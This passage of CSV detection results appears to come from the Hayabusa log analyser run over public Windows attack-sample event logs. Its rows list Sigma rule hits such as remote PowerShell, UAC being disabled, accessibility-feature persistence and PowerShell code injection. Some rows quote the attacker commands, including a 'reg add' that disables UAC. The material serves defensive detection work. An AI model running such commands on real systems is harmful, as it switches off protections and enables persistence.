C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 